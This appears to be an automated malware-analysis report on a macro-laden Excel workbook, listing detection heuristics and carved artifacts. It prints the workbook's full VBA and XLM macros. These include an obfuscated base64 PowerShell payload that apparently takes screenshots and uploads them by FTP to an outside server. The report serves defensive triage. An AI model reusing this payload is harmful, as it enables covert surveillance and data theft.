Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 6d7f21732afd7d59…

MALICIOUS

Office (OOXML) / .XLSX

24.3 KB Created: 2026-06-21 12:52:45 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2026-06-26
MD5: 016962bbddc307f5881b3c215480c130 SHA-1: 72c85283afc49933fb999c19756352540479d8b0 SHA-256: 6d7f21732afd7d59c5cf7bf5f1aca03d7d1ef2201160c013d90ed42e11e0a2ee
200 Risk Score

Heuristics 8

  • Excel 4.0 macro sheet (2 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Dangerous XLM formula APIs: EXEC, HALT critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Hidden worksheet (hidden, veryHidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 2 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10527 bytes
SHA-256: 32422ab76f668b59887fcf716735a94974f34480202de1bc747aba6703f8f890
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 19 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
      Call CreateTextFile
     Application.Run "Macro1!A1"
    Call UnhideVeryHiddenSheet
    End Sub

Sub UnhideVeryHiddenSheet()
     
    ThisWorkbook.Sheets("Macro1").Visible = 2
   
End Sub


Sub CreateTextFile()
    Dim filePath As String
    filePath = "D:\test.txt"

    Open filePath For Output As #1
        Print #1, "IwAgAD0APQA9AD0APQAgADgGJiA3Br4GNwYbBjoGUgE3BrEAOAYhIDcGpwAgADgGxgIgADcGvgY4BsYCNwanADcGqAA3BrkAIAAoADcGrwA4BhogOgZSATgGGiA3BqcAOAY5ICAAOAYmIDcGpwA4BiAgOAYgIDcGrwAgADgGfgY3BqcAOgZSATgGHiAgADcGpwA3BrUAOAYeIDoGUgEpACAAPQA9AD0APQA9AA0ACgAkAHgAMQAgAD0AIABAAHsADQAKACAAIAAgACAAcAAgAD0AIAAiAE0ATQBGACIAIAAgACAAIAANAAoAfQANAAoADQAKACQAeAAyACAAPQAgAEAAewANAAoAIAAgACAAIABhADEAIAA9ACAAIgBaAG4AUgB3AE8AaQA4AHYAWgBuAFIAdwBkAFgAQgBzAGIAMgBGAGsATABtADUAbABkAEMAOQBvAGQARwBSAHYAWQAzAE0AdgAiAA0ACgAgACAAIAAgAGEAMgAg" & _
"AD0AIAAiAGEAVwBZAHcAWAB6AFEAeQBNAFQAawAzAE4AVABnADUAIgANAAoAIAAgACAAIABhADMAIAA9ACAAIgBlAFcAaAByAGMAbQBWAFAAUQBXAFoANgBWAGsAMAA0AFQAVwBVAD0AIgANAAoAfQANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAGYAMQAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAWwBzAHQAcgBpAG4AZwBdACQAZAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAYgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABkACkADQAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUA" & _
"eAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgApAA0ACgAgACAAIAAgAH0AIABjAGEAdABjAGgAIAB7ACAAcgBlAHQAdQByAG4AIAAkAG4AdQBsAGwAIAB9AA0ACgB9AA0ACgANAAoAJAByACAAPQAgAEAAewANAAoAIAAgACAAIABzACAAPQAgAGYAMQAgACQAeAAyAC4AYQAxAA0ACgAgACAAIAAgAHUAIAA9ACAAZgAxACAAJAB4ADIALgBhADIADQAKACAAIAAgACAAcAAgAD0AIABmADEAIAAkAHgAMgAuAGEAMwANAAoAIAAgACAAIABlACAAPQAgACIAcABuAGcAIgANAAoAIAAgACAAIAB0ACAAPQAgACQAZQBuAHYAOgBUAEUATQBQAA0ACgB9AA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAZgAyACAAewAN" & _
"AAoAIAAgACAAIAAkAHQAcwAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAIgBNAE0AZABkAC0ASABIAG0AbQAiAA0ACgAgACAAIAAgACQAZgBuACAAPQAgACIAJAAoACQAeAAxAC4AcAApACQAdABzAC4AJAAoACQAcgAuAGUAKQAiAA0ACgAgACAAIAAgACQAZgBwACAAPQAgAEoAbwBpAG4ALQBQAGEAdABoACAAJAByAC4AdAAgACQAZgBuAA0ACgAgACAAIAAgAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgAEEAZABkAC0AVAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMADQAKACAAIAAgACAAIAAgACAAIABBAGQAZAAtAFQA" & _
"eQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAA0ACgANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgALQBuAG8AdAAgACgAJwB6ADEAJwAgAC0AYQBzACAAWwB0AHkAcABlAF0AKQApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQQBkAGQALQBUAHkAcABlACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAHoAMQAgAHsADQAKACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAo" & _
"ACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQANAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAUwBlAHQAUAByAG8AYwBlAHMAcwBEAFAASQBBAHcAYQByAGUAKAApADsADQAKAH0ADQAKACIAQAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABbAHoAMQBdADoAOgBTAGUAdABQAHIAbwBjAGUAcwBzAEQAUABJAEEAdwBhAHIAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgANAAoAIAAgACAAIAAgACAAIAAgACQAcwBjACAAPQAgAFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4AUwBjAHIAZQBlAG4AXQA6ADoAUAByAGkAbQBhAHIA" & _
"eQBTAGMAcgBlAGUAbgAuAEIAbwB1AG4AZABzAA0ACgAgACAAIAAgACAAIAAgACAAJAB3ACAAPQAgACQAcwBjAC4AVwBpAGQAdABoAA0ACgAgACAAIAAgACAAIAAgACAAJABoACAAPQAgACQAcwBjAC4ASABlAGkAZwBoAHQADQAKAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAHcAIAAtAGwAZQAgADAAIAAtAG8AcgAgACQAaAAgAC0AbABlACAAMAApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgANAAoAIAAgACAAIAAgACAAIAAgACQAYgBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALgBCAGkAdABt" & _
"AGEAcAAgACQAdwAsACAAJABoAA0ACgAgACAAIAAgACAAIAAgACAAJABnAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQApAA0ACgAgACAAIAAgACAAIAAgACAAJABnAHIALgBDAG8AcAB5AEYAcgBvAG0AUwBjAHIAZQBlAG4AKAAkAHMAYwAuAEwAZQBmAHQALAAgACQAcwBjAC4AVABvAHAALAAgADAALAAgADAALAAgACQAYgBtAC4AUwBpAHoAZQApAA0ACgAgACAAIAAgACAAIAAgACAAJABiAG0ALgBTAGEAdgBlACgAJABmAHAALAAgAFsAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4ASQBtAGEAZwBpAG4AZwAuAEkAbQBhAGcAZQBGAG8AcgBtAGEA" & _
"dABdADoAOgBQAG4AZwApAA0ACgAgACAAIAAgACAAIAAgACAAJABnAHIALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAIAAgACAAIAAgACQAYgBtAC4ARABpAHMAcABvAHMAZQAoACkADQAKACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGYAcAApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIABAAHsAIAB4ACAAPQAgACQAZgBwADsAIAB5ACAAPQAgACQAZgBuACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAk" & _
"AG4AdQBsAGwADQAKAH0ADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABmADMAIAB7AA0ACgAgACAAIAAgAHAAYQByAGEAbQAoACQAbAAsACAAJABtACkADQAKACAAIAAgACAADQAKACAAIAAgACAAaQBmACAAKAAtAG4AbwB0ACAAJABsACAALQBvAHIAIAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAbAApACkAIAB7ACAAcgBlAHQAdQByAG4AIAAkAGYAYQBsAHMAZQAgAH0ADQAKACAAIAAgACAADQAKACAAIAAgACAAdAByAHkAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAANAAoAIAAgACAAIAAgACAAIAAgACQAdwBjAC4A" & _
"QwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4ATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsACgAJAByAC4AdQAsACAAJAByAC4AcAApAA0ACgAgACAAIAAgACAAIAAgACAAJAB3AGMALgBVAHAAbABvAGEAZABGAGkAbABlACgAJAByAC4AcwAgACsAIAAkAG0ALAAgACIAUwBUAE8AUgAiACwAIAAkAGwAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAB0AHIAdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAYwBhAHQAYwBoACAAewANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABmAGEAbABzAGUADQAKACAAIAAgACAAfQANAAoAIAAg" & _
"ACAAIABmAGkAbgBhAGwAbAB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAB3AGMAKQAgAHsAIAAkAHcAYwAuAEQAaQBzAHAAbwBzAGUAKAApACAAfQANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgANAAoAIwAgAD0APQA9AD0APQAgADcGrQA4Bh4gOAYaIDgGISDiAKwgUgE6BlIBIAA3BqgAOgZSAeIArCBSATgGICA4BiEgNwanADoGUgE3Br4GIAAoADcGrAA3BqcAOgZSATkGrwA3BrIAOgZSATgGICAgADgGfgY3BqcAOgZSATgGHiAgAFYAQgBTACkAIAA9AD0APQA9AD0ADQAKAHcAaABpAGwAZQAgACgAJAB0AHIAdQBlACkAIAB7AA0ACgAgACAAIAAgACMAIAA4BiYgNwauADgGfgY6BlIBIAA5BqkANwaxADcGrwA4BiAgIAA4Br4AOAYgIDcGrAA3BrEA" & _
"OAYhICAAOQapADgGICA3BrMAOAbGAjgGHiAgACgAOAYhIDgGJiA3BqcAOAYgICAAOQapADcGrwAgADcGpwA4BiAgNwa+BjgGISA3BqcAOgZSASAAOAZ+BjcGpwA6BlIBOAYeICAAUABTADEAKQANAAoAIAAgACAAIAB0AHIAeQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHcAYwBkACAAPQAgAEAAJwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIAB6ADIAIAB7AA0ACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABs" & _
"ACIAKQBdACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABHAGUAdABDAG8AbgBzAG8AbABlAFcAaQBuAGQAbwB3ACgAKQA7AA0ACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAUwBoAG8AdwBXAGkAbgBkAG8AdwAoAEkAbgB0AFAAdAByACAAaABXAG4AZAAsACAAaQBuAHQAIABuAEMAbQBkAFMAaABvAHcAKQA7AA0ACgB9AA0ACgAnAEAADQAKACAAIAAgACAAIAAgACAAIABBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8A" & _
"bgAgACQAdwBjAGQADQAKACAAIAAgACAAIAAgACAAIAAkAGMAaAAgAD0AIABbAHoAMgBdADoAOgBHAGUAdABDAG8AbgBzAG8AbABlAFcAaQBuAGQAbwB3ACgAKQANAAoAIAAgACAAIAAgACAAIAAgAFsAegAyAF0AOgA6AFMAaABvAHcAVwBpAG4AZABvAHcAKAAkAGMAaAAsACAAMAApAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAYwBhAHQAYwBoACAAewANAAoAIAAgACAAIAB9AA0ACgANAAoAIAAgACAAIAAjACAANwa+BjcGowA3Bq4AOgZSATcGsQAgADoGtQAgADcGqwA3BqcAOAYgIDoGUgE4BiEg4gCsIFIBNwanADoGUgEgACgAOAYmIDcGtwA3BqcANwaoADgGGiAgADgGfgY3BqcAOgZSATgGHiAgADcGpwA3BrUAOAYeIDoGUgEpAA0ACgAgACAAIAAgAFMAdABh" & _
"AHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADUADQAKAA0ACgAgACAAIAAgACMAIAA5Bq8ANwaxADgGfgY3Br4GOAYgICAANwanADcGswA5BqkANwaxADoGUgE4BiAg4gCsIFIBNwa0ADcGpwA3Br4GIAA4BsYCIAA3BqIAOAa+ADgGHiA4BsYCNwavAA0ACgAgACAAIAAgACQAYwByACAAPQAgAGYAMgANAAoADQAKACAAIAAgACAAaQBmACAAKAAkAGMAcgApACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAdQByACAAPQAgAGYAMwAgAC0AbAAgACQAYwByAC4AeAAgAC0AbQAgACQAYwByAC4AeQANAAoAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAYwByAC4AeAApACAAewANAAoA" & _
"IAAgACAAIAAgACAAIAAgACAAIAAgACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABjAHIALgB4ACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACMAIAA9AD0APQA9AD0AIAA3Br4GNwajADcGrgA6BlIBNwaxACAANwa+BjcGtQA3BqcANwavADgGfgY6BlIBIAA3BqgAOgZSATgGICAgADEAOgawACAANwa+BjcGpwAgADIAMAAgADcGqwA3BqcAOAYgIDoGUgE4BiEgIAAoADgGJiA3BrkANwanADcGrwA4Bh4gIABWAEIAUwApACAAPQA9AD0APQA9AA0ACgAgACAAIAAgACQAYQAgAD0AIAAx" & _
"ADAADQAKACAAIAAgACAAJABiACAAPQAgADIAMAANAAoAIAAgACAAIAAkAGMAIAA9ACAAJABhACAAKgAgADEAMAAwADAAIAAgACAAIAAgACAAIAAgACAAIAAjACAAOgazADoGsAA6BrAAOAasADoGsAA6BrAAOgawACAAOAYmIDoGUgE4Bh4gOgZSAeIArCBSATcGqwA3BqcAOAYgIDoGUgE4BiEgDQAKACAAIAAgACAAJABkACAAPQAgACQAYgAgACoAIAAxADAAMAAwACAAIAAgACAAIAAgACAAIAAgACAAIwAgADoGtgA6BrAAOgawADgGrAA6BrAAOgawADoGsAAgADgGJiA6BlIBOAYeIDoGUgHiAKwgUgE3BqsANwanADgGICA6BlIBOAYhIA0ACgAgACAAIAAgACMAIAA3Bq8ANwaxACAAVgBCAFMAOgAgAGUAIAA9ACAAYwAgACsAIABJAG4AdAAoAFIAbgBkACAAKgAgACgA" & _
"ZAAgAC0AIABjACkAKQAgACAA4gAgIBkgIAAgADcGuQA3Bq8ANwavADoGUgEgADcGqAA6BlIBOAYgICAAYwAgADcGvgY3BqcAIAAoAGQALQAxACkADQAKACAAIAAgACAAJABlACAAPQAgACQAYwAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAE0AaQBuAGkAbQB1AG0AIAAwACAALQBNAGEAeABpAG0AdQBtACAAKAAkAGQAIAAtACAAJABjACkAKQANAAoAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAJABlAA0ACgB9AA=="
    Close #1
    

End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 30720 bytes
SHA-256: 70c7cee4fa203bb34742dcb56d2d50255ed1a667ae3ae9143f8af1b37173667e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 19 long base64-like blob(s).
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 2735 bytes
SHA-256: c0fb88ac2e3b970294f41dd67cd3623700820a2e506dc98a5c5d50226158a3cc
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{29E3ED3D-C8C3-406E-BBED-20D574D5290D}"><dimension ref="A1:B15"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/><cols><col min="1" max="1" width="10.77734375" customWidth="1"/><col min="2" max="2" width="28.5546875" customWidth="1"/></cols><sheetData><row r="1" spans="1:2" x14ac:dyDescent="0.3"><c r="A1" s="2"><f>EXEC(B1&amp;" "&amp;B2&amp;B4&amp;" "&amp;B3&amp;B5&amp;B6)</f><v>33</v></c><c r="B1" s="3" t="s"><v>1</v></c></row><row r="2" spans="1:2" x14ac:dyDescent="0.3"><c r="A2" t="b"><f>HALT()</f><v>1</v></c><c r="B2" s="1" t="s"><v>2</v></c></row><row r="3" spans="1:2" x14ac:dyDescent="0.3"><c r="B3" s="4" t="s"><v>0</v></c></row><row r="4" spans="1:2" x14ac:dyDescent="0.3"><c r="B4" s="4" t="s"><v>3</v></c></row><row r="5" spans="1:2" x14ac:dyDescent="0.3"><c r="B5" s="5" t="s"><v>4</v></c></row><row r="6" spans="1:2" x14ac:dyDescent="0.3"><c r="B6" s="5" t="s"><v>5</v></c></row><row r="7" spans="1:2" x14ac:dyDescent="0.3"><c r="B7" s="5"/></row><row r="8" spans="1:2" x14ac:dyDescent="0.3"><c r="B8" s="5"/></row><row r="9" spans="1:2" x14ac:dyDescent="0.3"><c r="B9" s="5"/></row><row r="10" spans="1:2" x14ac:dyDescent="0.3"><c r="B10" s="5"/></row><row r="11" spans="1:2" x14ac:dyDescent="0.3"><c r="B11" s="5"/></row><row r="12" spans="1:2" x14ac:dyDescent="0.3"><c r="B12" s="5"/></row><row r="13" spans="1:2" x14ac:dyDescent="0.3"><c r="B13" s="5"/></row><row r="14" spans="1:2" x14ac:dyDescent="0.3"><c r="B14" s="5"/></row><row r="15" spans="1:2" x14ac:dyDescent="0.3"><c r="B15" s="5"/></row></sheetData><sheetProtection algorithmName="SHA-512" hashValue="ZAmsDz3+AeY1eTLrpnnVtgrJULIsJiWlw2I+6DWUyNqIF+rgff9JDR+OBjbHjkO+9EslqOPCBBkcR7BtKfCUDQ==" saltValue="RyWZiZpub46ZjlEhtXvEig==" spinCount="100000" sheet="1" objects="1" scenarios="1"/><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_01.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet2.xml 2150 bytes
SHA-256: 07b2b4ffa4fe786ec55dc72f5b2521bdeed36cbb84838a97523c9e9637d22bad
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{D562D40C-7ADB-4072-B165-1E5CFF695309}"><dimension ref="A1:C14"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"><selection activeCell="A11" sqref="A11"/></sheetView></sheetViews><sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/><sheetData><row r="1" spans="1:3" x14ac:dyDescent="0.3"><c r="A1"><v>123</v></c></row><row r="2" spans="1:3" x14ac:dyDescent="0.3"><c r="A2"><v>1321</v></c><c r="B2"><v>34534</v></c></row><row r="3" spans="1:3" x14ac:dyDescent="0.3"><c r="A3"><v>5</v></c></row><row r="4" spans="1:3" x14ac:dyDescent="0.3"><c r="A4"><v>21</v></c><c r="B4"><v>3213</v></c></row><row r="6" spans="1:3" x14ac:dyDescent="0.3"><c r="B6"><v>5</v></c></row><row r="7" spans="1:3" x14ac:dyDescent="0.3"><c r="A7"><v>5</v></c></row><row r="8" spans="1:3" x14ac:dyDescent="0.3"><c r="A8"><v>34</v></c><c r="B8"><v>55</v></c></row><row r="10" spans="1:3" x14ac:dyDescent="0.3"><c r="B10"><v>321</v></c></row><row r="11" spans="1:3" x14ac:dyDescent="0.3"><c r="A11"><v>435</v></c></row><row r="12" spans="1:3" x14ac:dyDescent="0.3"><c r="B12"><v>345</v></c></row><row r="13" spans="1:3" x14ac:dyDescent="0.3"><c r="A13"><v>5</v></c><c r="C13"><v>5</v></c></row><row r="14" spans="1:3" x14ac:dyDescent="0.3"><c r="A14"><v>5</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.